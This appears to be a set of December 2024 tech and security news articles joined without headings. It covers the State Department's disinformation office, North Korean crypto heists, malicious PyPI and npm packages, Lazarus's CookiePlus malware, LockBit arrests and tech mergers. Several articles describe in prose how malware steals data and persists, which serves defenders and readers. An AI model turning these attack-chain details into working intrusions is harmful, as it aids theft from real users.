The State Department’s center for fighting global disinformation received a lump of coal in its Christmas stocking this week as congressional lawmakers excluded new funding and authorization for the office beyond this year.

The Global Engagement Center, which tracks foreign disinformation, will lose  its authority on Dec. 24. Despite a concerted push by State officials to lobby Congress for an extension, a measure to extend the center’s authority into 2031 was stripped out of the final version of defense authorization legislation that passed through the Senate.

“The Global Engagement Center will terminate by operation of law [by the end of the day] on December 23, 2024,” a State Department spokesperson told CyberScoop in an email. “The Department of State has consulted with Congress regarding next steps.”

According to figures provided by State, the GEC has a staff of approximately 120 and an annual budget of $61 million. The spokesperson did not address questions about what will happen to the center’s personnel and technology following the closure.

The shuttering will leave the State Department without a dedicated office for countering disinformation abroad for the first time since 2016. The closure comes at the end of a year when U.S. officials, foreign political leaders and private companies tracking disinformation have alleged that Russia and China have engaged in concerted propaganda campaigns targeting democratic elections in Taiwan, Moldova, Georgia, Romania and other countries.

“This is extremely frustrating,” Mark Montgomery, former executive director of the Cyberspace Solarium and a supporter of extending the center’s authority, told CyberScoop. “On a bipartisan basis, both political parties know that Russia, China and, to a lesser degree, Iran and other non-state actors, conduct information operations against us spreading lies, and the GEC was a good tool for ensuring that the truth, as we see it, came out.”

While the center does not focus on disinformation targeting the United States, its work with related organizations faced  criticism from congressional Republicans and Elon Musk, who accused the center in 2023 of being “the worst offender in U.S. government censorship [and] media manipulation.”

Musk is now an adviser  to President-elect Donald Trump and was placed in charge of an advisory board for cutting programs and reducing government spending.

Additionally, Republicans on the Hill raised questions about the GEC’s value, suggesting its work might duplicate existing analysis from  the private sector and other parts of government.

In interviews with CyberScoop and FedScoop last month, GEC leaders pushed back on those views, calling their work “critical” to combatting foreign propaganda campaigns in allied countries and emphasizing that they take active steps to exclude data on U.S. persons from their analysis.

“We are really the first analytical unit in the U.S. government that takes this kind of comprehensive approach of looking at threat actors — Iranians, [China], the Russians — and try to understand … what their influence is broadly on the information space in different geographic regions,” said Carrie Goux, GEC’s acting deputy coordinator.

Lindsay Gorman, a former White House official under the Biden administration, told CyberScoop that there is “a lack of recognition in Congress that the wars democracies are fighting with autocrats overseas are no longer only in the physical domain, but in the cyberspace realm of 1s and 0s.”

“Whether their goal is to marshal support for invading neighbors or undermine U.S. credibility overseas, the U.S. needs a means to fight back. One way is to expose covert campaigns for what they are — important work the GEC is doing,” said Gorman, now at the nonprofit German Marshall Fund. “GEC has been the eyes and ears on the ground when it comes to information threats overseas, tracking where autocratic strategic objectives lie and how tactics are evolving to guide responses.”

Gorman stressed that Russian and Chinese disinformation campaigns “aren’t going away” and are increasingly leveraging social media and emerging technologies like generative AI “to sow discord and undermine democracy around the world.”

GEC officials also said their limited budget  has hindered efforts to acquire advanced technology needed to support their work, including tools to detect AI-manipulated media. 

State Department documents obtained by FedScoop detail a range of solutions and tools the center hoped to acquire if it was reauthorized, including a system for detecting photoshopped images, a “meme detection” model to help analyze and contextualize imagery, a detector for imagery created through Stable Diffusion, and a tool to detect AI-generated assets in video.

Montgomery said that with Republicans set to take control of the State Department and both houses of Congress next month, they are positioned to shape the GEC’s mission and operations to address any concerns about impinging on domestic U.S. issues.

“The frustration is, why not give it an extension now that you’re basically responsible?” Montgomery asked. 

COMMENTARY

Despite never-ending data breaches and ransomware attacks, too many companies still rely on the outdated “trust but verify” cybersecurity strategy. This approach assumes that any user or device inside a company’s network can be trusted once it has been verified. The approach has clear weaknesses: Many businesses are putting themselves at additional risk by verifying once, then trusting forever.

There was a time when trust but verify made sense, namely when networks were self-contained and well-defined. But at some point, perhaps due to the overwhelming volume of devices on a network, the number of patches needing to be applied, user demands, and resource constraints in the cybersecurity team, things began to slip. Initial verification meant the asset was trusted, but no additional verification ever took place.

The User Example of Trust Without Ongoing Verification

It’s easy to see how this happens with users. A user typically goes through a background check when they join the company, but once onboarded, despite any number of changes in their lives that could affect their trustworthiness, we allow them to access our systems and data without further verification. 

In the majority of cases, the absence of further verification does not cause damage. However, if the user decides to act against the best interest of their employer, the results can be catastrophic. The more sensitive the information the individual has access to, the greater the risk. This is why individuals with security clearances are regularly re-vetted, and security personnel may conduct regular finance checks to identify any issues early and intervene to mitigate possible damage.

In organizations that follow a trust-but-verify approach, two personas stand out: those that have considered the risk of one-time asset verification acceptable; and — the minority — those that try to manage the risk with a re-verification program. A shift in persona from the former to the latter usually only occurs after a breach, a crisis in availability, or another “career limiting disaster.”

The reality is that there are simply not enough hours in the day for security practitioners to do all of the things that must be done. Have security patches been correctly applied to all vulnerable devices? Are all third-party security assessments properly analyzed? Do all Internet of Things (IoT) devices really belong on the network? Are managed security services performing as expected? 

Compromising one of these trusted devices means being granted trust to move laterally across the network, accessing sensitive data and critical systems. Organizations likely will not know the extent of their exposure until something goes wrong. 

The Costly Consequences of Insufficient Verification

When these breaches are eventually discovered, the costs begin to mount. Companies face not only the direct costs of incident response, but potentially also regulatory fines, class-action lawsuits, lost customers, and lasting damage to their brand reputation. Relatively small incidents can cost millions of dollars, while large incidents regularly cost billions.

In addition to these direct costs, insufficient verification also leads to more frequent and expensive compliance audits. Regulators and industry bodies are increasingly demanding that companies demonstrate robust identity and access management controls, for example under the European Union’s upcoming Digital Operational Resilience Act (DORA), as well as continuous monitoring and validation of user and device activity. Certifications and accreditations can no longer be accepted at face value. 

The Path Forward: Adopt a Zero-Trust Approach

Instead of trusting after verification, businesses should instead allow only what the business needs, for as long as it needs it. Never trust, always verify. This is how a zero-trust architecture operates.

Every user, device, and application that attempts to make a connection, regardless of its location, is scrutinized and validated, dramatically limiting the potential damage from a successful compromise. A zero-trust architecture replaces firewalls and VPNs, so there are fewer devices to maintain, and a reduced attack surface means fewer opportunities for attackers to gain a foothold.

Zero trust doesn’t mean zero testing; testing should form an integral part of any IT and cybersecurity strategy. However, it does mean the likelihood of a major failure stemming from trust being extended to users, devices, or applications that do not deserve it, is a thing of the past. 

The North Korean hacker group ‘TraderTraitor’ stole $308 million worth of cryptocurrency in the attack on the Japanese exchange DMM Bitcoin in May.

In a short post, the FBI attributed the attack to the state-affiliated threat actor TraderTraitor, also tracked as Jade Sleet, UNC4899, and Slow Pisces.

The crypto heist occurred in May 2024 and forced the platform to restrict account registration, cryptocurrency withdrawals, and trading until the completion of the investigations.

Earlier this week, a report from blockchain intelligence firm Chainalysis attributed the attack to North Korean threat actors but did not share any specific details.

Attack chain

In a short announcement, the FBI says that TraderTraitor’s attack on DMM Bitcoin started in late March 2024, when one of the attackers pretended to be a legitimate recruiter on LinkedIn and approached an employee of Ginco, a Japanese enterprise cryptocurrency wallet software company.

The hacker sent the Ginco employee, who had access to his employer’s wallet management system, a job proposal involving a pre-employment test on GitHub. This tactic has been popular with North Korean threat groups this year [1, 2].

The victim received a piece of malicious Python code to copy to their personal GitHub page in order to carry out the conduct the test. The code, however, compromised the computer and allowed TraderTraitor to infiltrate Ginco and then move laterally to DMM.

“After mid-May 2024, TraderTraitor actors exploited session cookie information to impersonate the compromised employee and successfully gained access to Ginco’s unencrypted communications system,” explains the FBI.

“In late May 2024, the actors likely used this access to manipulate a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time of the attack,” the agency says.

U.S. authorities have been monitoring the activity of TraderTraitor since 2022 when the threat actor started to target the blockchain space with fake apps.

In 2023, GitHub warned of a social engineering campaign conducted by the particular threat actors on the platform, targeting the accounts of developers in the blockchain, cryptocurrency, online gambling, and cybersecurity sectors.

Later, the FBI warned that TraderTraitor was preparing to cash out 1,580 Bitcoin (valued at the time at around $41 million) stolen from various sources that year.

Dec 24, 2024Ravie LakshmananMalware / Data Exfiltration

Cybersecurity researchers have flagged two malicious packages that were uploaded to the Python Package Index (PyPI) repository and came fitted with capabilities to exfiltrate sensitive information from compromised hosts, according to new findings from Fortinet FortiGuard Labs.

The packages, named zebo and cometlogger, attracted 118 and 164 downloads each, prior to them being taken down. According to ClickPy statistics, a majority of these downloads came from the United States, China, Russia, and India.

Zebo is a “typical example of malware, with functions designed for surveillance, data exfiltration, and unauthorized control,” security researcher Jenna Wang said, adding cometlogger “also shows signs of malicious behavior, including dynamic file manipulation, webhook injection, stealing information, and anti-[virtual machine] checks.”

The first of the two packages, zebo, uses obfuscation techniques, such as hex-encoded strings, to conceal the URL of the command-and-control (C2) server it communicates with over HTTP requests.

It also packs in a slew of features to harvest data, including leveraging the pynput library to capture keystrokes and ImageGrab to periodically grab screenshots every hour and save them to a local folder, prior to uploading them to the free image hosting service ImgBB using an API key retrieved from the C2 server.

In addition to exfiltrating sensitive data, the malware sets up persistence on the machine by creating a batch script that launches the Python code and adds it to the Windows Startup folder so that it’s automatically executed upon every reboot.

Cometlogger, on the other hand, is a lot of feature-packed, siphoning a wide range of information, including cookies, passwords, tokens, and account-related data from apps such as Discord, Steam, Instagram, X, TikTok, Reddit, Twitch, Spotify, and Roblox.

It’s also capable of harvesting system metadata, network and Wi-Fi information, a list of running processes, and clipboard content. Furthermore, it incorporates checks to avoid running in virtualized environments and terminates web browser-related processes to ensure unrestricted file access.

“By asynchronously executing tasks, the script maximizes efficiency, stealing large amounts of data in a short time,” Wang said.

“While some features could be part of a legitimate tool, the lack of transparency and suspicious functionality make it unsafe to execute. Always scrutinize code before running it and avoid interacting with scripts from unverified sources.”

Opinion One of the charms of coding is that malice can be indistinguishable from incompetence. Last week’s Who, Me? story about financial transfer test software running amok is a case in point.

The hapless dev left code running overnight that should have moved a single cent in and out of his test account. Instead, it machine-gunned $100 transfers in for hours. It tripped internal security but the temporarily rich kid had told his boss about it and could thus talk his way clear.

What if the bank-raiding routine hadn’t been detected? Our hero would have come in to find a huge cash stash sitting there, a highly tempting proof of concept perhaps. Not coming clean would be malicious, but the code’s the same whether he ‘fessed up or not.

This is exactly the quandary US authorities are pondering as they consider banning products by Chinese consumer networking company TP-Link. These are very popular because the hardware is good and reliable, but mostly because they are remarkably cheap. So cheap, in fact, that the company is suspected of dumping, selling at under cost to take market share. The main reason for suspicion, though, is the routers’ firmware. It’s outstandingly prone to vulnerabilities, ridden with things like buffer overflows, to the point that mere incompetence seems an insufficient explanation.

This sounds like a conspiracy theory because the evidence is ambiguous. Line up the circumstantial evidence and it’s at least plausible. If TP-Link does have a corporate fondness for crap coders, how come the features visible to owners in everyday use work well, while invisible vulnerabilities are so common? Chinese law compels all domestic companies to cooperate with state security in secret. There is already evidence of widespread Chinese infiltration of communication infrastructure with Salt Typhoon. Motive, opportunity, ability, and history: where does the balance of probabilities lie?

It would be possible to prove TP-Link products were uniquely vulnerable by statistical analysis, comparing them to competitive products from other vendors. At that point, it doesn’t really matter what the reason is, they could be taken off the market because of consumer safety worries. That wouldn’t do much good, given the huge installed base, and the uniquely attractive environment infrastructure offers to the bad guys. It’s invisible to end users, hard to monitor, hard to update, and once something’s installed and working, it is highly disruptive to rip it out.

A great/awful example of this is the recently disclosed Iranian-linked attack on US and Israeli energy and IoT devices, part of a family of attacks that have targeted a wide range of devices from a wide range of manufacturers. Whoever created the IOCONTROL malware is highly competent and inventive, but at first glance it seems unlikely that the firmware of the target devices would contain deliberately vulnerable Iranian-sourced code. Iran has no international IT infrastructure makers to manipulate, being locked away behind sanctions. This need not stop it. Nor anyone else.

Industrial espionage is exceptionally hard to spot until the stolen secrets come to light. Likewise, industrial sabotage can be equally hard to trace. When that industry is firmware, and the malicious actor has no intention of using the information in detectable ways, this is even more so. Given how valuable zero days are to attackers, how much easier would they be to exploit if you put them there yourself?

You don’t even need to embed a star player in your target company, just someone competent enough to send copies of the code under development back to the malware creators, and get their changes back into the tree.

Do all those IoT, industrial control, and router companies have the ability to spot highly disguised vulnerabilities slipped in by malicious experts? They’re not very good at spotting incompetent errors, given the many alerts the industry generates.

Catching corrupt coders is always going to be hard, unless their own opsec is bad. It’s also most embarrassing to go public when you do. Even in security services and the military, where employees are routinely screened and counter-espionage is a specialty, the job is still very difficult. It’s not as if ideology or animus are needed to tempt someone into sin: cash and flattery do the job just as well.

It’s not a case of whether this is happening. The opportunities are too great, the risk too small, and the outlays too modest to resist. The question is how to find it, given that nobody seems to be looking. A company responsible for a vulnerability has the responsibility to fix it, but not to track down how it came to be and who was involved. There is no agency tracking and correlating this information, not unless national security is directly involved.

This just in: it is. We just don’t really believe it. Until we do, there’s an entire industry-wide meta-vulnerability going completely unchecked. Better believe it. ®

China’s national cyber incident response center accused the U.S. government of launching cyberattacks against two Chinese tech companies in a bid to steal trade secrets.

In a notice Wednesday, the National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT) said a suspected U.S. intelligence agency was behind the attacks, and that CNCERT had “handled” them, according to a Google translation.

The U.S. government has long accused China of cyber espionage to steal trade secrets from domestic companies, and China’s allegations about U.S. cyberattacks arrives in the midst of a very public campaign from U.S. government officials blaming China for a major attack on telecommunications carriers.

CNCERT said one of the attacks dates back to August of this year, against “a certain advanced material design and research unit.” The suspected attackers exploited a vulnerability in a document management system to infiltrate the software upgrade management server the company used, then install Trojans in more than 270 hosts of the company, CNCERT said.

The other attack dates to May of last year, against a “large-scale high-tech enterprise” in China’s “smart energy and digital information industry,” according to CNCERT. The center’s analysis determined that the attackers exploited Microsoft Exchange vulnerabilities to get into the company’s mail server, then implanted backdoors and took control of devices at the company and its subsidiaries.

China has, in recent years, stepped up its charges about U.S. cyberattacks. The report did not name a specific U.S. government office or entity responsible for the attacks.

The Chinese Communist Party-owned newspaper China Daily published an infographic this year detailing allegations that the United States is the leading source of cyberattacks against China over the past five years, citing CNCERT in part.

Republican lawmakers, as well as a top official in the incoming second Trump administration, have said recently in response to the Salt Typhoon telecommunications breaches that the United States has been too timid about going on offense against China.

CNCERT describes itself as a non-governmental non-profit cybersecurity technical center. China Daily said it is led by the Ministry of Industry and Information Technology.

Spokespeople for the National Security Agency and U.S. Cyber Command did not immediately respond to requests for comment Thursday.

NEWS BRIEF

A newly unsealed criminal complaint by US law enforcement shows they have been working to dismantle the LockBit ransomware-as-a-service group for several years, including a previously undisclosed arrest of one of the operation’s lead developers in Israel last August.

Rostislav Panev, a 51-year-old with dual Russian-Israeli citizenship, is facing extradition to the US to face charges along with two others accused of similarly working for LockBit, not just to develop the ransomware itself but also tools used by affiliates. For his part, Panev is accused of working on LockBit ransomware from its beginnings in 2019, eventually creating one of the most prolific ransomware operations in the world, according to the Justice Department’s statement about the arrest.

Panev, according to the Justice Department, at the time of his arrest had admin credentials for LockBit’s Dark Web online repository with the ransomware’s source code, as well as the source code for an affiliate tool called “StealBit” used to exfiltrate stolen data. His laptop also had he access credentials for the LockBit control panel used by affiliates. The Justice Department’s statement adds that Panev confessed to his role in the LockBit ransomware operation.

“The Justice Department’s work going after the world’s most dangerous ransomware schemes includes not only dismantling networks, but also finding and bringing to justice the individuals responsible for building and running them,” Attorney General Merrick Garland said in a statement about the arrests. “Three of the individuals who we allege are responsible for LockBit’s cyberattacks against thousands of victims are now in custody, and we will continue to work alongside our partners to hold accountable all those who lead and enable ransomware attacks.”

Three popular npm packages, @rspack/core, @rspack/cli, and Vant, were compromised through stolen npm account tokens, allowing threat actors to publish malicious versions that installed cryptominers.

The supply chain attack, spotted by both Sonatype and Socket researchers, deployed the XMRig cryptocurrency miner on compromised systems for mining the hard-to-trace Monero privacy cryptocurrency.

Additionally, Sonatype discovered that all three npm packages fell victim to the identical compromise on the same day, affecting multiple versions.

Rspack is a high-performance JavaScript bundler written in Rust, used in building and bundling JavaScript projects.

The two packages that were compromised are its core component and the command line interface (CLI) tool, downloaded 394,000 and 145,000 times weekly, respectively, on npm.

Vant is a lightweight, customizable Vue.js UI library tailored for building mobile web applications, providing pre-designed, reusable UI components. It is also relatively popular, garnering 46,000 weekly downloads on npm.

Cryptomining activity

The malicious code is hidden inside the ‘support.js’ file on @rspack/core, and in the ‘config.js’ file in ‘@rspack/cli,’ and fetches its configuration and command-and-control (C2) instructions from an external server.

The malware leverages npm’s postinstall script to execute automatically upon package installation.

Once it’s running, it retrieves the geographic location and network details of the victim’s system.

“This call accesses the geolocation API at http://ipinfo.io/json, potentially gathering IP addresses, geographic location, and other network details about the victim’s system,” explains Socket.

“Such reconnaissance is often used to tailor attacks based on the user’s location or network profile.”

The XMRig binary is downloaded from a GitHub repository, and for the compromised Vant package, it is renamed to ‘/tmp/vant_helper’ to conceal its purpose and blend into the filesystem.

The cryptomining activity uses execution parameters that limit CPU usage to 75% of the available processor threads, which strikes a good balance between cryptomining performance and evasion.

Sonatype’s Ax Sharma says that the following Monero address was found in the compromised Rspack packages:

475NBZygwEajj4YP2Bdu7yg6XnaphiFjxTFPkvzg5xAjLGPSakE68nyGavn8r1BYqB44xTEyKQhueeqAyGy8RaYc73URL1j

Response to compromise

Both Rspack and Vant confirmed that their NPM accounts were compromised, releasing new, cleaned versions of their packages and apologizing to the community for failing to safeguard the supply chain.

“On 12/19/2024, 02:01 (UTC), we discovered that our npm packages @rspack/core and @rspack/cli were maliciously attacked. The attacker released v1.1.7 using a compromised npm token, which contained malicious code. We took immediate action upon discovering the issue,” explained the Rspack developers.

“This release is to fix a security issue. We found that one of our team members’ npm token was stolen and used to release multiple versions with security vulnerabilities. We have taken measures to fix it and re-released the latest version,” posted the Vant developer.

The compromised Rspack version to avoid is 1.1.7, which contains the malicious crypto mining code.

Users are recommended to upgrade to v1.1.8 or later. The version before the malicious one, v1.1.6, is also safe, but the latest has implemented additional security measures.

Regarding Vant, multiple compromised versions should be avoided. These are: 2.13.3, 2.13.4, 2.13.5, 3.6.13, 3.6.14, 3.6.15, 4.9.11, 4.9.12, 4.9.13, and 4.9.14.

Users are recommended to upgrade to Vant v4.9.15 and newer, which is a safe re-release of the latest version of the software.

This incident follows other recent supply chain compromises, like those on LottieFiles, which targeted people’s cryptocurrency assets, and Ultralytics, which hijacked users’ hardware resources for cryptomining.

The Lazarus Group, an infamous threat actor linked to the Democratic People’s Republic of Korea (DPRK), has been observed leveraging a “complex infection chain” targeting at least two employees belonging to an unnamed nuclear-related organization within the span of one month in January 2024.

The attacks, which culminated in the deployment of a new modular backdoor referred to as CookiePlus, are part of a long-running cyber espionage campaign known as Operation Dream Job, which is also tracked as NukeSped by cybersecurity company Kaspersky. It’s known to be active since at least 2020, when it was exposed by ClearSky.

These activities often involve targeting developers and employees in various companies, including defense, aerospace, cryptocurrency, and other global sectors, with lucrative job opportunities that ultimately lead to the deployment of malware on their machines.

“Lazarus is interested in carrying out supply chain attacks as part of the DeathNote campaign, but this is mostly limited to two methods: the first is by sending a malicious document or trojanized PDF viewer that displays the tailored job descriptions to the target,” the Russian firm said in an exhaustive analysis.

“The second is by distributing trojanized remote access tools such as VNC or PuTTY to convince the targets to connect to a specific server for a skills assessment.”

The latest set of attacks documented by Kaspersky involve the second method, with the adversary making use of a completely revamped infection chain delivering a trojanized VNC utility under the pretext of conducting a skills assessment for IT positions at prominent aerospace and defense companies.

It’s worth noting that Lazarus Group’s use of rogue versions of VNC apps to target nuclear engineers was previously highlighted by the company in October 2023 in its APT trends report for Q3 2023.

“Lazarus delivered the first archive file to at least two people within the same organization (we’ll call them Host A and Host B),” researchers Vasily Berdnikov and Sojun Ryu said. “After a month, they attempted more intensive attacks against the first target.”

The VNC apps, a trojanized version of TightVNC called “AmazonVNC.exe,” are believed to have been distributed in the form of both ISO images and ZIP files. In other cases, a legitimate version of UltraVNC was used to sideload a malicious DLL packed within the ZIP archive.

The DLL (“vnclang.dll”) serves as a loader for a backdoor dubbed MISTPEN, which was uncovered by Google-owned Mandiant in September 2024. It’s tracking the activity cluster under the moniker UNC2970. MISTPEN, for its part, has been found to deliver two additional payloads codenamed RollMid and a new variant of LPEClient.

Kaspersky said it also observed the CookieTime malware being deployed on Host A, although the exact method that was used to facilitate it remains unknown. First discovered by the company in September and November 2020, CookieTime is so named for its use of encoded cookie values in HTTP requests to fetch instructions from a command-and-control (C2) server.

Further investigation of the attack chain has revealed that the threat actor moved laterally from Host A to another machine (Host C), where CookieTime was again used to drop various payloads between February and June 2024, such as follows –

• LPEClient, a malware that comes fitted with capabilities to profile compromised hosts
• ServiceChanger, a malware that stops a targeted legitimate service so as to sideload a rogue DLL embedded within it using the executable via DLL side-loading
• Charamel Loader, a loader malware that decrypts and loads internal resources like CookieTime, CookiePlus, and ForestTiger
• CookiePlus, a new plugin-based malicious program that’s loaded by both ServiceChanger and Charamel Loader

“The difference between each CookiePlus loaded by Charamel Loader and by ServiceChanger is the way it is executed. The former runs as a DLL alone and includes the C2 information in its resources section,” the researchers pointed out.

“The latter fetches what is stored in a separate external file like msado.inc, meaning that CookiePlus has the capability to get a C2 list from both an internal resource and an external file. Otherwise, the behavior is the same.”

CookiePlus gets its name from the fact that it was disguised as an open-source Notepad++ plugin called ComparePlus when it was detected in the wild for the first time. In the attacks targeting the nuclear-related entity, it has been found to be based on another project named DirectX-Wrappers.

The malware serves as a downloader to retrieve a Base64-encoded, RSA-encrypted payload from the C2 server, which is then decoded and deciphered to execute three different shellcodes or a DLL. The shellcodes are equipped with features to collect system information and make the main CookiePlus module sleep for a certain number of minutes.

It’s suspected that CookiePlus is a successor to MISTPEN owing to behavioral overlaps between the two malware families, including the aspect that both have disguised themselves as Notepad++ plugins.

“Throughout its history, the Lazarus group has used only a small number of modular malware frameworks such as Mata and Gopuram Loader,” Kaspersky said. “The fact that they do introduce new modular malware, such as CookiePlus, suggests that the group is constantly working to improve their arsenal and infection chains to evade detection by security products.”

The findings come as blockchain intelligence firm Chainalysis revealed that threat actors affiliated with North Korea have stolen $1.34 billion across 47 cryptocurrency hacks in 2024, up from $660.50 million in 2023. This included the May 2024 breach of Japanese cryptocurrency exchange, DMM Bitcoin, which suffered a loss of $305 million at the time.

“Unfortunately, it appears that the DPRK’s crypto attacks are becoming more frequent,” the company said. “Notably, attacks between $50 and $100 million, and those above $100 million occurred far more frequently in 2024 than they did in 2023, suggesting that the DPRK is getting better and faster at massive exploits.”

Analysis When Donald Trump takes office for his second term on January 20, many expect sweeping changes across the board. But among tech players, when it comes to mergers and acquisitions, those hoping for looser regulations might be disappointed. 

Under the Biden administration, the perception of heightened regulatory scrutiny and antitrust enforcement has fueled dissatisfaction among the tech elite. Even some who supported Vice President Kamala Harris’s failed presidential bid wanted Chair Lina Khan out of the FTC.

“There’s been a lot of reporting done that the current FTC is, for lack of a better term, more aggressive in finding objections to proposed transactions that historically would not have faced the same degree of scrutiny,” Andrew Luh, partner and chair of M&A practice at Silicon Valley law firm Gunderson Dettmer told The Register in an interview. 

“There are a lot of high profile examples in the news about deals that are being challenged,” Luh added, referring to high-profile deals like Microsoft’s acquisition of Activision-Blizzard and other top-tier cases that Khan’s FTC has fought. “If you’re just using those types of [cases], the fact that some of those companies appear to be less favored under the current enforcement regime would have some chilling effect.”

Despite those high-profile antitrust cases, Luh said the pace hasn’t slowed down that much. 

“We, as a firm, will work on about 150 a year and we’re not a huge firm by any means,” Luh said. “So the aggregate tech M&A deal stats are still massive, even if you silo off [the most scrutinized deals].” 

There’s data to support that when it comes to large-scale deals. S&P Global put out a report on the M&A outlook under the second Trump administration shortly after the election that suggested, contrary to the perception of the Biden administration as a trust-busting, anti-acquisition administration, the total number of tech, media, and telecom (TMT) acquisitions valued over $500 million has actually been higher under Biden than Trump’s first term. 

As of the end of October 2024, there have been 235 $500M+ TMT M&As under Biden, and just 223 during Trump’s four years in office. Even with the added scrutiny, the median number of days it took to complete those M&As only rose by a single day under Biden – 77 days for the average deal compared to 76 under Trump.

Beyond that, PricewaterhouseCooper (PwC) deals partner Lori Bistis told us, any years following the COVID-19 pandemic are going to look slow compared to the immediate aftermath of 2020. 

Both 2021 and 2022 saw a huge rise in M&A activity in the tech sector and outside of it, Bistis and Luh noted. 

“You went from a level of dealmaking that was unprecedented to more normal numbers,” Bistis said. “If you look at it based on the last three or four years, dealmaking in 2023 was down in tech.” 

Bistis pointed to new merger guidelines issued by the Department of Justice and FTC in late 2023, as well as upcoming changes to premerger notification rules, set to take effect on February 10, as factors contributing to a slowdown in deal activity this year.

“There’s more effort that has to go into what you produce for the government and the regulatory agencies to get a deal done,” Bistis said. “Overall from a regulatory standpoint, there’s a lot more review going on.” 

Economic factors are at play, too

Bistis and Luh both mentioned that a slowdown in post-COVID M&A activity isn’t solely on the FTC and DoJ – there’s economics at work, too. 

“You’ll always see a slowdown in dealmaking during an election year just because that equates to uncertainty,” Bistis noted. High interest rates and geopolitical tensions are playing a role, she said. 

Those factors have led companies to explore alternatives to traditional M&A, which still involve significant dealmaking but often face fewer regulatory hurdles, Bistis noted. Divestitures and joint ventures are both hot right now, thanks in large part to economic challenges in the tech sector. 

“Historically for big tech, there hasn’t been much of a focus on divestitures, but I think we’ve seen that a bit more,” Bistis said. 

If you think about the last couple of years, it’s been about a lot of restructuring in tech

This is evident in the numerous layoffs, closures, and spinoffs we’ve seen in recent years. 

“If you think about the last couple of years, it’s been about a lot of restructuring in tech,” Bistis said – and that means “efficiency,” she noted. “Part of [restructuring] is usually looking at some non-core assets that maybe you can extract some value out of them sooner if you sell.” 

Khan’s legacy: Tougher M&As, Trump or not

Bistis said she expects the trend of divestitures and joint ventures to continue as Biden-era regulations come onto the books that make M&As a bigger hassle, and undoing those rules won’t be as easy as issuing an executive order.

As mentioned above, the new changes to the Hart-Scott-Rodino (HSR) premerger notification rules and forms are going to make it even more cumbersome to get an acquisition past the authorities.

According to FTC chair Khan, the new HSR forms include requirements for companies to report a lot of additional information. Submissions will need to include info on entities and individuals involved in deals that will have the ability to influence post-acquisition decision making, supply relationships that may undermine competition or rival’s access to key products or services, information about products and services still under development that are not yet generating revenues, and details of certain prior acquisitions closed by both firms in the past five years to help regulators assess whether the transaction is part of an anticompetitive roll-up scheme.

The HSR updates and 2023 merger guidelines were both passed by the Commission on unanimous votes of 5-0 and 3-0, respectively. While the 2023 guidelines were voted on before Republican commissioners joined the Biden-era FTC, the new HSR rules were okayed by Democrats and Republicans alike – including Trump’s pick to head the FTC, Andrew Ferguson. 

While noting the new HSR rule “is not perfect, nor is it the rule I would have written if the decision were mine alone” in his concurring statement, Ferguson nonetheless voted to ratify it. 

“The additional information sought in the Final Rule is ‘necessary and appropriate,'” Ferguson opined. “Its benefits are many, and, by comparison, the added burdens are reasonable.”

Additionally, an FTC spokesperson pointed out to The Register that the new HSR rules haven’t resulted in a single lawsuit yet. This could suggest that companies have largely acquiesced to the new requirements.

The Trump transition team didn’t respond to questions for this story.

Cautious optimism among transition chaos

As we’ve noted in several stories covering the potential policies of the incoming Trump administration, there’s a lot of uncertainty swirling around Trump’s plans for his second term that’s led to the tech industry hitting the brakes on big changes. Things are largely the same in the M&A world right now. 

As compared to the regulatory trends we’ve seen over the last several years, I think it’s a cautious optimism

Both Luh and Bistis said their clients have been operating under a “wait and see” mindset, with Luh in particular saying that most businesses are just trying to wrap up year-end matters rather than thinking about 2025 acquisition plans. 

Bistis, on the other hand, said that the people she’s been speaking with are excited that the M&A process might become a little simpler: Even if the paperwork isn’t going away, regulators might take a more hands-off approach. 

“I think as compared to the regulatory trends we’ve seen over the last several years, I think it’s a cautious optimism,” Bistis said. “The benchmark over the last four years was pretty tough.” 

That said, anyone in the tech space who’s preparing to get the deal motor running come Trump’s inauguration would do well to get their house in order, Bistis told us, pointing to a number of suggestions PwC publishes for TMT firms.

“Focus on collecting the data now that you need to respond to said regulatory increases,” Bistis suggested. “You never want to be the hold up.”

“There’s a lot to be done – especially with these new HSR requirements coming out,” the PwC advisor said – and those rules are unlikely to vanish before Trump takes office. “The more [you] can get ahead of that, if you’re preparing to do an M&A, the better.” ®